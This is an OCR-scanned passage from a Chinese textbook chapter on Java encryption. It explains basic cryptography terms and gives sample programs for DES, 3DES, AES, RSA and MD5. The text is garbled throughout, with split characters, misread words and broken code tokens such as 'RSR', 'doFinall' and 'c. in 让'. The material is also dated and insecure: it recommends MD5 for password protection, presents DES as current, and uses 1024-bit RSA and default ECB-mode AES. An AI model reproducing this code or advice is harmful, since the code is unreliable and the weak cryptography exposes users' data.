法 知道 解密 的 方法 ,仍然 无 法 了 解 信息 的 内 容 。 数 据 加 密 技术 已 经 广泛 应 用 于 因特网 
电子 商务 .手机 网 络 和 银行 自动 取款 机 等 领域 。 加 密 系统 中 有 如 下 重要 概念 。 

(1) 明文 (plaintext) : 需要 被 保护 的 消息 。 

(2) 密 文 (ciphertext) : 将 明文 利用 一 定 算法 进行 改变 后 的 消息 。 

(3) 加 密 (Cencryption) : 将 明文 利用 一 定 算法 转换 成 密 文 的 过 程 。 

(4) 解密 (decryption) : 由 密 文 恢 复出 明文 的 过 程 。 

(5) 敌 方 : 也 称 攻击 者 ,通过 各 种 办 法 ,窃取 机 密 信息 ,来 达到 非法 的 目的 。 
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(6) 被 动 攻击 (passive attack) : 通过 获取 密 文 ,其 目的 是 经 过 分 析 得 到 明文 ,这 是 
一 类 攻击 的 总 称 。 

(7) 主动 攻击 (active attack) : 非法 入 侵 者 采用 自 改 、 伪 造 等 手段 向 系统 注入 假 消 
息 等 ,这 也 是 一 类 攻击 的 总 称 。 

(8) 加 密 算法 : 对 明文 进行 加 密 时 采用 的 算法 。 

(9) 解密 算法 : 对 密 文 进行 解密 时 采用 算法 。 

这 里 特别 需要 强调 的 一 个 概念 是 : 密 钥 (key)。 密 钥 包 括 加 密 密 钥 (encryption 


key) 和 解密 密 钥 (decryption key)。 由 于 加 密 算法 和 解密 算法 的 操作 通常 是 在 一 组 输 


入 数据 的 控制 下 进行 的 ,这 组 输入 数据 就 叫做 密 钥 ,在 加 密 时 使 用 的 密 钥 为 加 密 密 钥 ， 


”解密 时 使 用 的 密 钥 为 解密 密 钥 。 


在 密码 系统 (加 密 系统 和 解密 系统 ,为 了 方便 讲解 ,后 面 将 密码 系统 称 为 加 密 系统 ) 
中 ,有 两 大 主要 要 素 

。 密码 算法 (加 密 算法 和 解密 算法 ); 

。 密 钥 。 

两 者 之 间 具 有 紧密 的 联系 。 以 最 简单 的 “ 恺 撤 加 密 法 ”为 例 : 

古风 马 的 恺 撤 大 帝 曾 经 使 用 密码 来 传递 信息 , 即 所 谓 的 “已 撒 密码 ”"。 它 是 一 种 替 


代 密 码 , 通 过 将 字母 按 顺序 推 后 3 位 起 到 加 密 作 用 。 如 将 字母 A 换 作 字母 D, 将 字母 B 
， 换 作 字 母 E,X、Y.Z 字母 分 别 又 变 为 AB、C 字母 。 如 China 可 以 变 为 Fklqd; 解密 过 


程 相 反 。 

在 这 个 简单 的 加 密 方法 中 ,“ 向 右 移 位 ”, 可 以 理解 为 加 密 算法 ;“3” 可 以 理解 为 加 
密 密 钥 。 对 于 解密 过 程 ,“ 向 左 移 位 ”, 可 以 理解 为 解密 算法 ;“3” 可 以 理解 为 解密 密 钥 。 
显然 , 密 钥 是 一 种 参数 , 它 是 在 明文 转换 为 密 文 或 将 密 文 转换 为 明文 的 算法 中 输入 的 
数据 。 

恺 撤 加 密 法 的 安全 性 来 源 于 两 个 方面 : 

。 对 密码 算法 本 身 的 保密 ; 

。 对 密 钥 的 保密 。 

单单 对 密码 算法 进行 保密 ,以 保护 信息 ,在 学 界 和 业界 已 有 相当 讨论 ,一 般 认为 是 
不 够 安全 的 。 目 前 在 业界 中 广泛 认为 的 是 ,加 密 之 所 以 安全 ,是 因为 其 密 钥 的 保密 ,并 


非 加 密 算 法 本 身 的 保密 。 因 此 ,密码 算法 一 般 公 开 ,而 将 密 钥 进行 保密 。 如 果 攻 击 者 要 
| 通过 密 文 得 到 明文 ,除非 对 每 一 个 可 能 的 密 钥 进行 穷 举 性 测试 。 从 后 面 的 篇 幅 可 以 看 


出 ,流行 的 一 些 加 密 解密 算法 一 般 是 完全 公开 的 。 敌 方 如 果 取 得 已 加 密 的 数据 ,即使 得 
知 加 密 算法 , 若 没有 密 钥 ,也 不 能 进行 解密 。 


12.1.2 常见 的 加 密 算法 


加 密 技术 从 本 质 上 说 是 对 信息 进行 编码 和 解码 的 技术 。 加 密 是 将 可 读 信息 (明文 ) 
变 为 代码 形式 ( 密 文 ); 解密 是 加 密 的 逆 过 程 .相当 于 将 密 文 变 为 明文 。 加 密 算法 有 很 
多 种 ,这 些 算法 一 般 可 分 为 3 类 : 

。 对 称 加 密 ; 

。 非 对 称 加 密 ， 
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& 


， 单 向 加 密 。 

对 称 加 密 算法 应 用 较 早 ,技术 较为 成 熟 。 其 过 程 如 下 : 

(1) 发 送 方 将 明文 用 加 密 密 钥 和 加 密 算 法 进行 加 密 处 理 , 变 成 密 文 ,连同 密 钥 一 
起 ,发 送 给 接收 方 。 

(2) 接收 方 收 到 密 文 后 ,使 用 发 送 方 的 加 密 密 钥 及 相同 算法 的 逆 算 法 对 密 文 解密 ， 
恢复 为 明文 。 

在 对 称 加 密 算法 中 ,双方 使 用 的 密 钥 相同 ,要 求解 密 方 事先 必须 知道 对 方 使 用 的 加 
密 密 钥 。 其 算法 一 般 公开 ,优势 是 计算 量 较 小 、 加 密 速度 较 快 .效率 较 高 。 不 足 之 处 是 ， 
通信 双方 都 使 用 同样 的 密 钥 , 密 钥 在 传送 的 过 程 中 ,可 能 被 敌 方 获 取 , 安 全 性 得 不 到 保 
证 。 当 然 ,为 了 安全 起 见 , 用 户 每 次 使 用 该 算法 , 密 钥 可 以 更 换 , 但 是 原来 通信 的 密 钥 也 
不 能 马上 删除 ,这 样 , 使 得 双方 所 拥有 的 密 钥 数 量 很 大 ,对 于 双方 来 说 , 密 钥 管理 较为 
困难 。 

对 称 加 密 算法 中 ,目前 流行 的 算法 有 : 

。 DES; 

。 3DES; 

。 IDEA; 

。 AES, 等 等 。 
其 中 ,AES 由 美国 国家 标准 局 倡导 ,即将 作为 新 标准 取代 DES。 

与 对 称 加 密 算法 不 同 , 非 对 称 加 密 算法 需要 两 个 密 钥 : 公开 密 钥 (publickey) 和 私 
有 密 钥 (privatekey) 。 每 个 人 都 可 以 产生 这 两 个 密 钥 ,其 中 ,公开 密 钥 对 外 公开 (可 以 通 


过 网 上 发 布 , 也 可 以 传输 给 通信 的 对 方 ), 私 有 密 钥 不 公开 。 对 于 同一 段 数据 ,利用 非 对 ， 


称 加 密 算法 具有 如 下 人 性质 ， 
。 如 果 用 公开 密 钥 对 数据 进行 加 密 , 那 么 只 有 用 对 应 的 私有 密 钥 才 能 对 其 
解密 ; 
。 如 果 用 私有 密 钥 对 数据 进行 加 密 , 那 么 只 有 用 对 应 的 公开 密 钥 才能 对 其 
解密 。 
非 对 称 加 密 算法 的 基本 过 程 是 : 
(1) 通信 前 ,接收 方 随机 生成 一 对 公开 密 钥 和 私有 密 钥 ,将 公开 密 钥 公 开 给 发 送 
方 ,自己 保留 私有 密 钥 ; 
(2) 发 送 方 利用 接收 方 的 公开 密 钥 加 密 明文 ,使 其 变 为 密 文 ; 
(3) 接收 方 收 到 密 文 后 ,使 用 自己 的 私有 密 钥 解密 密 文 ,获得 明文 。 
目前 ,在 非 对 称 密码 体系 中 ,使 用 得 比较 广泛 的 是 非 对 称 加 密 算法 有 : 
。 RSA; 
。 美国 国家 标准 局 提出 的 DSA ,等 等 。 


和 对 称 加 密 算法 相 比 , 非 对 称 加 密 算法 的 保密 性 比较 好 ,在 通信 的 过 程 中 ,只 存在 
公开 密 钥 在 网 络 上 的 传输 .而 公开 密 钥 被 敌 方 获取 ,也 没有 用 ; 因此 ,基本 不 用 担心 密 


钥 在 网 上 被 截获 而 引起 的 安全 问题 。 但 该 加 密 体系 中 ,加 密 和 解密 花费 时 间 比 较 长 、 速 


度 比 较 慢 , 一 般 情 况 下 , 它 不 适合 于 对 大 量 数据 的 文件 进行 加 密 , 而 只 适用 于 对 少量 数 


据 进行 加 密 。 
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另 一 类 算法 是 单 向 加 密 算法 。 该 算法 在 加 密 过 程 中 .输入 明文 后 由 系统 直接 经 过 
加 密 算法 处 理 ,得 到 密 文 ,不 需要 使 用 密 钥 。 既 然 没 有 密 钥 , 那 么 就 无 法 通过 密 文 恢复 
为 明文 。 

那么 这 种 方法 有 什么 应 用 呢 ? 主要 是 可 以 用 于 进行 某 些 信息 的 鉴别 。 在 鉴别 时 ， 
重新 输入 明文 ,并 经 过 同样 的 加 密 算法 进行 加 密 处 理 ,得 到 密 文 ,然后 看 这 个 密 文 是 否 
和 以 前 得 到 的 密 文 相同 ,来 判断 输入 的 明文 是 否 和 以 前 的 明文 相同 。 这 在 菜 种 程度 上 


， 讲 ,也 是 一 种 解密 。 


该 方法 计算 复杂 ,通常 只 在 数据 量 不 大 的 情形 下 使 用 ,如 计算 机 系统 口令 保护 措施 
中 ,这 种 加 密 算法 就 得 到 了 广泛 的 应 用 。 近 年 来 , 单 向 加 密 的 应 用 领域 正在 逐渐 增 大 。 


。 应 用 较 多 单 向 加 密 算法 的 有 ， 


。 RSA 公司 发 明 的 MD5 算法 ; 

。 美国 国家 安全 局 (NSA) 设计 ,美国 国家 标准 与 技术 研究 院 (NIST) 发 布 的 
SHA ,等 等 。 

大 多 数 语言 体系 (如 . NET Java) 都 具有 相关 的 API 支持 各 种 加 密 算法 。 本 章 以 


Java 语言 为 例 来 阐述 加 密 解 密 过 程 , 这 些 算 法 在 其 他 语言 中 的 实现 ,读者 可 以 参考 相 


关 资 料 。 

提示 “本 书 中 对 加 密 算法 的 实现 ,实际 上 利用 了 高 级 语言 中 包装 的 API。 也 就 
是 说 ,我 们 并 不 对 算法 本 身 进 行 讲述 ,只 对 算法 的 实现 进行 介绍 。 如 果 要 进行 底层 加 密 
算法 的 实现 ,读者 可 以 参考 相关 文献 。 

实际 上 ,在 真实 应 用 的 场合 ,可 以 使 用 系统 提供 的 加 密 解 密 函 数 进行 加 密 解 密 , 因 
为 这 些 函 数 的 发 布 , 经 过 了 严密 的 测试 ,理论 上 讲 是 安全 的 。 


12.2 实现 对 称 加 密 


如 前 所 述 ,对称 加 密 算法 过 程 中 ,发 送 方 将 明文 和 加 密 密 钥 一 起 经 过 加 密 算 法 处 


理 , 变 成 密 文 ,发 送出 去 ; 接收 方 收 到 密 文 后 ,使 用 加 密 密 钥 及 相同 算法 的 逆 算 法 对 密 


解密 。 


文 解密 ,恢复 为 明文 。 双 方 使 用 的 密 钥 相同 .要 求解 密 方 事先 必须 知道 加 密 密 钥 。 从 这 
里 可 以 得 出 几 个 结论 : 
(1) 加 密 时 使 用 什么 密 钥 ,解密 时 必须 使 用 相同 的 密 钥 , 否 则 将 无 法 对 密 文 进行 


(2) 对 同样 的 信息 ,从 理论 上 讲 ,不 同 的 密 钥 ,加 密 结果 不 相同 ; 同样 的 密 文 ,用 不 
同 的 密 钥 解 密 ,结果 也 应 该 不 同 。 

本 节 介 绍 3 种 流行 的 对 称 加 密 算法 : DES、3DES 和 AES。 在 编程 的 过 程 中 ,力求 
用 不 同 的 构架 来 向 读者 展示 加 密 和 解密 的 过 程 。 


12.2.1 用 Java 实现 DES 
DES 是 数据 加 密 标准 [中 (Data Encryption Standard) 的 简称 ,来 源 于 IBM 的 研究 
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工作 ,并 在 1977 年 被 美国 政府 正式 采纳 。 这 种 密 钥 系统 使 用 得 非常 广泛 ,最 初 开发 
DES 是 嵌入 硬件 中 ,后 来 在 其 他 领域 得 到 了 发 展 , 目 前 ,在 金融 数据 安全 保护 等 领域 ， 
DES 发 挥 了 巨大 的 作用 。 

DES 算法 的 基本 思想 如 下 : 

首先 确定 一 个 64 位 的 初始 密 钥 玉 ( 也 称 为 主 密 钥 ) ,在 这 64 位 中 ,实际 的 密 钥 只 有 
56 位 , 另 有 8 位 是 奇偶 校 验 位 ,分 布 于 64 位 密 钥 中 ,每 8 位 中 有 1 位 奇偶 检验 位 。 加 
密 过 程 比较 复杂 ,具体 大 家 可 以 参考 相关 文献 。 

要 对 DES 进行 攻击 ,一般 只 能 使 用 穷 举 的 密 钥 搜索 方法 , 即 重复 尝试 各 种 密 钥 , 直 
到 找到 符合 的 为 止 。 但 这 样 几乎 是 不 可 能 的 ,如 果 DES 使 用 56 位 的 密 钥 , 则 可 能 的 密 
钥 数 量 是 2” 个 。 

关于 DES 的 其 他 信息 ,可 以 参考 相关 资料 。 

在 对 称 加 密 中 ,解密 和 加 密 的 密 钥 一 定 要 相同 。 以 下 代码 是 用 Java 语言 实现 将 一 
个 字符 串 “ 郭 克 华 _ 安 全 编程 技术 ” 先 加 密 , 然 后 用 同样 的 密 钥 解密 的 过 程 。 不 过 ,由 于 
本 书 不 是 讲解 某 种 语言 本 身 ,所 以 在 这 里 略 过 Java 加 密 体系 的 讲解 ,在 代码 中 如 果 出 
现 新 的 API, 读 者 可 以 参考 Java 文档 。 


P12_01. java 


import javax. crypto. Cipher; 

import javax. crypto. KeyGenerator; 

import javax. crypto. NoSuchPaddingException; 
import javax. crypto. SecretKey; 

import java. security. NoSuchAlgorithmException; 
import java. security. Security; 


public class P12_01 
{ 
// KeyGenerator 提供 对 称 密 钥 生成 器 的 功能 ,支持 各 种 算法 
private KeyGenerator keygen; 
// SecretKey 负责 保存 对 称 密 钥 
private SecretKey deskey; 
// Cipher 负责 完成 加 密 或 解密 工作 
private Cipher c¢; 
// 该 字 节 数组 负责 保存 加 密 的 结果 
private byte[ ] cipherByte; 


public P12_01() 
{ 
Security. addProvider (new com. sun. crypto. provider. SunJCE( )); 
try 
{ 
// 实例 化 支持 DES 算法 的 密 钥 生成 器 
// (算法 名 称 命名 需 按 规定 ,否则 抛 出 异常 ) 
keygen = KeyGenerator.getInstance( "DES"); 
// 生成 密 钥 
deskey = keygen. generateKey(); 
// 生成 Cipher 对 象 ,指定 其 支持 DES 算法 
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c = Cipher.getInstance( "DES"); 

j 
catch( NoSuchAlgorithmException ex) 
\ 

ex. printStackTrace( ); 
} 
catch( NoSuchPaddingException ex) 
{ 

ex. printStackTrace( ); 
} 


/* 对 字符 串 str 加 密 * / 
public byte[ ] createEncryptor(String str) 


{ 


{ 


} 


try 
{ 
// 根据 密 钥 ,对 Cipher 对 象 进行 初始 化 
// ENCRYPT_MODE 表示 加 密 模式 
c. init(Cipher.ENCRYPT MODE, deskey); 
byte[] src = str.getBytes(); 
// 加 密 ,结果 保 存 进 cipherByte 
cipherByte = c.doFinal(src); 
} 
catch( java. security. InvalidKeyException ex) 
{ 
ex. printStackTrace( ); 
} 
catch( javax. crypto. BadPaddingException ex) 
{ 
ex. printStackTrace( ); 
} 
catch( javax. crypto. IllegalBlockSizeException ex) 
{ 
ex. printStackTrace( ); 
} 


return cipherByte; 


/* 对 字 节 数组 buff 解密 */ 
public byte[ ] createDecryptor(byte[ ] buff) 


try 


{ 


// 根据 密 钥 ,对 Cipher 对 象 进 行 初始 化 
// ENCRYPT_MODE 表示 解密 模式 


} 


c. init(Cipher. DECRYPT MODE, deskey); 
// 得 到 明文 , 存 人 cipherByte 字符 数组 
cipherByte = c.doFinal(buff); 


catch( java. security. InvalidKeyException ex) 


{ 


ex. printStackTrace( ); 
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} 
catch( javax. crypto. BadPaddingException ex) 
{ 
ex. printStackTrace( ); 
} 
catch( javax. crypto. IllegalBlockSizeException ex) 
{ 


ex. printStackTrace( ); 
} 
return cipherByte; 
} 
public static void main(String[ ] args) throws Exception 
{ 
P12_01 p12_01 = new P12 01(); 
String msg =" 郭 克 华 _ 安 全 编程 技术 "; 
System. out. println(" 明 文 是 : ”+ msg); 
byte[ ] enc = p12_01.createEncryptor(msg); 
System. out.println(" 密 文 是 : ”+ new String(enc)); 
byte[ ] dec = p12_01.createDecryptor(enc); 
System. out. println(" 解 密 后 的 结果 是 : " + new String(dec)); 


运行 后 的 结果 如 图 12-1 所 示 。 

提示 。 值得 一 提 的 是 ,在 读者 的 机 器 上 运 
行 , 密 文 的 内 容 会 不 一 样 。 因 为 KeyGenerator 每 
次 生成 的 密 钥 是 随机 的 ,加 密 的 结果 肯定 也 不 一 
样 。 这 很 容易 理解 ,否则 DES 算法 就 没有 安全 性 
可 语 了 。 

另外 ,本 例 中 ,加 密 和 解密 一 定 要 是 同一 个 密 钥 。 


12.2.2 用 Java 实现 3DES 


3DES, 即 三 重 DES, 是 DES 的 加 强 版 ,也 是 DES 的 一 个 更 安全 的 变形 。 它 使 用 3 
个 56 位 ( 共 168 位 ) 的 密 钥 对 数据 进行 3 次 加 密 , 和 DES 相 比 ,安全 性 得 到 了 较 大 的 提 
高 。 实 际 上 ,3DES 是 一 个 过 渡 的 加 密 算法 。1999 年 ,NIST 将 3-DES 指定 为 DES 向 
AES 过 渡 的 加 密 标准 。 

3DES 以 DES 为 基本 模块 ,通过 组 合 分 组 方法 设计 出 分 组 加 密 算法 。 若 三 个 密 钥 
互 不 相同 ,本 质 上 就 相当 于 用 一 个 长 为 168 位 的 密 钥 进 行 加 密 , 大 大 加 强 了 数据 的 安全 
性 。 若 数据 对 安全 性 要 求 不 高 ,可 以 让 其 中 的 两 个 密 钥 相等 ,这 样 , 密 钥 的 有 效 长 度 也 
有 112 位 。 

在 Java 的 加 密 体系 中 ,使 用 3DES 非常 简单 ,程序 结构 和 使 用 DES 时 相同 ,只 不 过 
在 初始 化 时 将 算法 名 称 由 DES 改 为 DESede 即 可 。 

下 列 程序 基本 原理 和 P12_01 相同 ,只 不 过 将 加 密 和 解密 过 程 写 在 一 起 。 
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P12_02. java 


import java. security. Security; 
import javax. crypto. Cipher; 


import javax. crypto. KeyGenerator; 
import javax. crypto. SecretKey; 
Note 

public class P12_02 

{ 


) 
) 人 


public static void main(String[ ] args) throws Exception 

// KeyGenerator 提供 对 称 密 钥 生成 器 的 功能 ,支持 各 种 算法 

KeyGenerator keygen; 

// SecretKey 负责 保存 对 称 密 钥 

SecretKey deskey; 

// Cipher 负责 完成 加 密 或 解密 工作 

Cipher c; 

Security. addProvider( new com. sun. crypto. provider. SunJCE( )); 
// 实例 化 支持 3DES 算法 的 密 钥 生成 器 ,算法 名 称 用 DESede 
keygen = KeyGenerator.getInstance("DESede"); 

// 生成 密 钥 

deskey = keygen. generateKey(); 

// 生成 Cipher 对 象 ,指定 其 支持 3DES 算法 
c = Cipher.getInstance("DESede" ); 


String msg = " 郭 克 华 _ 安 全 编程 技术 "; 
System. out. println(" 明 文 是 : " + msg); 


// 根据 密 钥 ,对 Cipher 对 象 进行 初始 化 ,ENCRYPT_MODE 表示 加 密 模 式 
c. init(Cipher. ENCRYPT MODE, deskey); 

byte[] src = msg.getBytes(); 

// 加 密 , 结 果 保存 进 enc 

byte[ ] enc = c.doFinall(src); 

System. out. println(" 密 文 是 : ”+ new String(enc)); 


// 根据 密 钥 ,对 Cipher 对 象 进行 初始 化 ,ENCRYPT_MODE 表示 加 密 模 式 
c. init(Cipher. DECRYPT_MODE, deskey); 
// 解密 ,结果 保存 进 dec 
byte[] dec = c.doFinal(enc); 
System. out. println(" 解 密 后 的 结果 是 : ”+ new String(dec)); 
} 
} 


运行 后 的 效果 如 图 12-2 所 示 。 


图 12-2 
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12.2.3 用 Java 实现 AES 


AES 在 密码 学 中 是 高 级 加 密 标 准 (Advanced Encryption Standard) 的 缩写 ,该 标准 
是 NIST 推出 旨 在 取代 DES 的 21 世纪 的 加 密 标 准 , 已 被 多 方 分 析 且 广 为 使 用 ,在 对 称 
加 密 系 统 中 ,成 为 最 流行 的 算法 之 一 。 

提示 。AES 算法 又 称 Rijndael 密码 算法 ,该 算法 为 比利时 密码 学 家 Joan 
Daemen 和 Vincent Rijmen 所 设计 ,结合 两 位 作者 的 名 字 , 以 Rijndael 命名 。 

AES 算法 已 被 广泛 应 用 在 各 个 领域 中 。AES 设计 的 密 钥 长 度 有 128、192、256 位 
3 种 , 比 DES 的 56 密 钥 安全 性 能 好 得 多 。 关 于 其 具体 思路 ,读者 可 以 参考 密码 学 
书籍 。 

以 下 代码 是 用 Java 语言 实现 AES 算法 ,将 一 个 字符 串 “ 郭 克 华 _ 安 全 编程 技术 ” 先 
加 密 , 然 后 用 同样 的 密 钥 解密 。 在 代码 中 如 果 出 现 新 的 API, 读 者 可 以 参考 Java 文档 。 


P12_03. java 


import java. security. Security; 
import javax. crypto. Cipher; 
import javax. crypto. KeyGenerator; 
import javax. crypto. SecretKey; 


public class P12_03 
{ 
public static void main(String[ ] args) throws Exception 
{ 
// KeyGenerator 提供 对 称 密 钥 生成 器 的 功能 ,支持 各 种 算法 
KeyGenerator keygen; 
// SecretKey 负责 保存 对 称 密 钥 
SecretKey deskey; 
// Cipher 负责 完成 加 密 或 解密 工作 
Cipher c; 
Security. addProvider(new com. sun. crypto. provider. SunJCE( )); 
// 实例 化 支持 RES 算法 的 密 钥 生成 器 ,算法 名 称 用 AES 
keygen = KeyGenerator.getInstance("AES"); 
// 生成 密 钥 
deskey = keygen. generateKey(); 
// 生成 Cipher 对 象 ,指定 其 支持 AES 算法 
c = Cipher. getInstance("AES"); 


String msg =“" 郭 克 华 _ 安 全 编程 技术 "; 
System. out. println(" 明 文 是 : ”+ msg); 


// 根据 密 钥 , 对 Cipher 对 象 进行 初始 化 , ENCRYPT MODE 表示 加 密 模式 
c. in 让 (Cipher. ENCRYPT_MODE, deskey); 

byte[ ] src = msg.getBytes(); 

// 加 密 , 结 果 保 存 进 enc 

byte[ ] enc = c.doFinal(src); 

System. out. println(" 密 文 是 : ”+ new String(enc)); 
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// 根据 密 钥 ,对 Cipher 对 象 进行 初始 化 , ENCRYPT_MODE 表示 加 密 模 式 
c. in 让 (Cipher. DECRYPT MODE, deskey); 
// 解密 ,结果 保存 进 dec 
byte[ ] dec = c. doFinal(enc); 
System. out. println(" 解 密 后 的 结果 是 : " + new String(dec) ) ; 
} 
} 


运行 后 的 效果 如 图 12-3 所 示 。 


C:\PROGRA~I\IINOIS“1\JCREAT “1\GE2001 exe 


图 12-3 
12.3 实现 非 对 称 加 密 


在 非 对 称 加 密 算 法 体系 中 ,接收 方 产生 一 个 公开 密 钥 和 一 个 私有 密 钥 ,公开 密 钥 可 
以 通过 各 种 手段 公开 。 发 送 方 将 明文 用 接收 方 的 公开 密 钥 进行 处 理 , 变 成 密 文 ,发 送出 
去 ; 接收 方 收 到 密 文 后 ,使 用 自己 的 私有 和 密 钥 对 密 文 解密 ,恢复 为 明文 。 在 这 种 通信 过 程 
中 , 密 钥 由 接收 方 产生 ,公开 密 钥 公开 .私有 密 钥 保密 。 该 通信 过 程 中 ,有 如 下 几 个 特点 : 

(1) 加 密 时 使 用 的 公开 密 钥 ,解密 时 必须 使 用 对 应 的 私有 密 钥 ,和 否则 无 法 将 密 文 
解密 。 

(2) 对 同样 的 信息 ,可 以 用 公开 密 钥 加 密 , 用 私有 密 钥 解密 ; 也 可 以 用 私有 密 钥 加 
密 , 用 公开 密 钥 解密 。 在 应 付 窃听 上 ,前 者 用 得 较 多 ,但 是 在 对 付 信息 自 改 和 抵赖 上 ,后 
者 用 得 较 多 。 

本 节 介 绍 两 种 流行 的 非 对 称 加 密 算法 : RSA 和 DSA。 


12.3.1 用 Java 实现 RSA 


RSA 算法 出 现 于 20 世纪 70 年 代 , 它 既 能 用 于 数据 加 密 , 也 能 用 于 数字 签名 。 由 
于 其 易于 理解 和 容易 操作 ,流行 程度 较 广 。 

该 算法 由 Ron Rivest、AdiShamir 和 Leonard Adleman 发 明 ,也 就 以 3 人 的 名 字 命 
名 。 针 对 RSA 的 研究 比较 广泛 ,在 使 用 的 过 程 中 ,经 历 了 各 种 攻击 的 考验 ,逐渐 被 普遍 
认为 是 目前 最 优秀 的 公 钥 方案 之 一 。 

RSA 的 安全 性 依赖 于 大 数 的 因子 分 解 .虽然 目前 并 没有 从 理论 上 证 明 破 译 RSA 
的 难度 与 大 数 分 解难 度 等 价 ,不 过 这 并 不 影响 RSA 的 流行 性 。 

关于 RSA 算法 的 描述 ,读者 可 以 参考 相关 文献 。RSA 可 用 于 数字 签名 ,具体 操作 
时 考虑 到 安全 性 和 信息 量 较 大 等 因素 ,一 般 可 以 先 作 HASH 运算 。 

由 于 进行 的 都 是 大 数 计算 ,使 得 RSA 最 大 的 问题 是 运行 时 间 较 长 。 无 论 是 软件 还 是 
硬件 实现 ,RSA 的 运行 速度 一 直 不 能 和 DES 相 比 ,一 般 来 说 只 用 于 少量 数据 加 密 情况 。 
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以 下 代码 是 用 Java 语言 实现 RSA 算法 ,将 一 个 字符 串 “ 郭 克 华 _ 安 全 编程 技术 ” 先 用 公 
钥 加 密 , 然 后 用 相应 的 私 钥 解 密 。 在 代码 中 如 果 出 现 新 的 API, 读 者 可 以 参考 Java 文档 。 


P12_04. java | 
import java. security. KeyPair; | 国 
import java. security. KeyPairGenerator; Note 
import java. security. interfaces. RSAPrivateKey; | 


import java. security. interfaces. RSAPublicKey; 


import javax. crypto.Cipher; 


public class P12_04 
{ 

// RSA 加 密 解 密 

public static void main(String[ ] args) 

{ 

try 
{ 

P12_04 p12_04 = new P12_04(); 
String msg =" 郭 克 华 _ 安 全 编程 技术 "; 
System. out. println(" 明 文 是 :" + msg); 
// KeyPairGenerator 类 用 于 生成 公 钥 和 私 钥 对 ,基于 RSA 算法 生成 对 象 
KeyPairGenerator keyPairGen = KeyPairGenerator.getInstance("RSA"); 
// 初始 化 密 钥 对 生成 器 , 密 钥 大 小 为 1024 位 
keyPairGen. initialize(1024); 
// 生成 一 个 密 钥 对 ,保存 在 keyPair 中 
KeyPair keyPair = keyPairGen. generateKeyPair(); 
// 得 到 私 钥 
RSAPrivateKey privateKey = (RSAPrivateKey) keyPair. getPrivate(); 
// 得 到 公 钥 
RSAPublicKey publicKey = (RSAPublicKey) keyPair. getPublic(); 


// 用 公 钥 加 密 

byte[ ] srcBytes = msg.getBytes(); 

byte[ ] resultBytes = pl2_04.encrypt(publicKey, srcBytes); 
String result = new String(resultBytes); 

System. out. println(" 用 公 钥 加 密 后 密 文 是 :" + result); 


// 用 私 钥 解密 
byte[ ] decBytes = p12_04. decrypt(privateKey, resultBytes) 
String dec = new String(decBytes); 
System. out. println(" 用 私 钥 解密 后 结果 是 :" + dec); 

} 

catch (Exception e) 

{ 
e. printStackTrace( ); 

} 


protected byte[ ] encrypt (RSAPublicKey publicKey, byte[] srcBytes) 
{ 
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if (publicKey != null) 
{ 
try 
Nn 
// cipher 负责 完成 加 密 或 解密 工作 ,基于 RSA 
和 Cipher cipher = Cipher. getInstance("RSR" ) ; 
// 根据 公 钥 ,对 Cipher 对 象 进行 初始 化 
cipher. init(Cipher. ENCRYPT_ MODE, publicKey); 
// 加 密 , 结 果 保 存 进 resultBytes 
byte[ ] resultBytes = cipher. doFinal(srcBytes); 
return resultBytes; 


} 
catch (Exception e) 
{ 


e.printStackTrace( ); 


} 


return null; 


protected byte[ ] decrypt (RSAPrivateKey privateKey, byte[] encBytes) 
{ 
if (privateKey != null) 
{ 
try 
{ 
Cipher cipher = Cipher.getInstance("RSA"); 
// 根据 私 钥 , 对 Cipher 对 象 进行 初始 化 
cipher. init(Cipher. DECRYPT_MODE, privateKey); 
// 解密 ,结果 保存 进 resultBytes 
byte[ ] decBytes = cipher. doFinal(encBytes); 
return decBytes; 
} 
catch (Exception e) 


{ 


e. printStackTrace( ); 


} 


return null; 


运行 后 的 效果 如 图 12-4 所 示 。 
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12.3.2 DSA 算法 


数字 签名 算法 (Digital Signature Algorithm,DSA) ,也 是 一 种 非 对 称 加 密 算法 ,被 
美国 NIST 作为 数字 签名 标准 (DigitalSignature Standard,DSS) 。DSA 一 般 应 用 于 数 
字 签 名 中 ,在 后 面 的 章节 将 会 讲解 。 


12.4 实现 单 向 加 密 


单 向 加 密 算 法 ,又 称 为 不 可 逆 加 密 算法 ,在 加 密 过程 中 不 需要 使 用 密 钥 ,明文 由 系 
统 加 密 处 理 成 密 文 , 密 文 无 法 解密 。 一 般 适 合 于 数据 的 验证 。 在 验证 过 程 中 ,重新 输入 
明文 ,并 经 过 同样 的 加 密 算 法 处 理 , 看 能 否 得 到 相同 的 密 文 ,由 此 判断 明文 的 正确 性 。 
该 算法 有 如 下 特点 : 

(1) 加 密 算法 对 同一 消息 反复 执行 该 函数 总 得 到 相同 的 密 文 ; 

(2) 加 密 算法 生成 的 密 文 是 不 可 预见 的 , 密 文 看 起 来 和 明文 没有 任何 关系 ; 

(3) 明文 的 任何 微小 变化 都 会 对 生成 的 密 文 产生 很 大 的 影响 ; 

(4) 具有 不 可 逆 性 , 即 通过 密 文 要 得 到 明文 ,理论 上 是 不 可 行 的 。 

本 节 介 绍 两 种 流行 的 单 向 加 密 算 法 : MD5 和 SHA。 


12.4.1 用 Java 实现 MDS 


MD5 的 全 称 是 Message-digest Algorithm 5( 信 息 -摘要 算法 ) ,最初 的 目标 是 用 于 


确保 信息 传输 过 程 中 的 完整 一 致 性 。MD5 算法 由 MD2 和 MD4 发 展 而 来 。 它 的 基本 
思想 是 : 将 大 容量 信息 变换 成 一 个 定 长 的 大 整数 ,这 个 大 整数 对 这 个 信息 来 说 是 单 向 
的 。 一 般 来 说 ,这 个 大 整数 称 为 消息 摘要 。MD5 能 够 获得 一 个 随机 长 度 的 信息 ,然后 
产生 一 个 128 位 的 信息 摘要 。 
MD5 广泛 用 于 密码 认证 、 软 件 序列 号 等 领域 中 。 相 关 信 息 大 家 可 以 参考 相应 文献 。 
以 下 代码 是 用 Java 语言 实现 MD5 算法 ,将 一 个 字符 串 “ 郭 克 华 _ 安 全 编程 技术 ”加 
密 。 在 代码 中 如 果 出 现 新 的 API, 读 者 可 以 参考 Java 文档 。 


P12_05. java 


import java. security. MessageDigest; 
import java. security. NoSuchAlgorithmException; 


public class P12_05 
{ 
// MD5 加 密 
Public byte[ ] encrypt(String msg) 
{ 
try 


// 根据 MD5 算法 生成 MessageDigest 对 象 
MessageDigest md5 = MessageDigest. getInstance("MD5"); 
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byte[ ] srcBytes = msg.getBytes(); 
// 使 用 srcBytes 更 新 摘要 

md5. update( srcBytes); 

// 完成 哈 希 计算 ,得 到 result 
byte[ ] resultBytes = md5. digest(); 
return resultBytes; 


} 
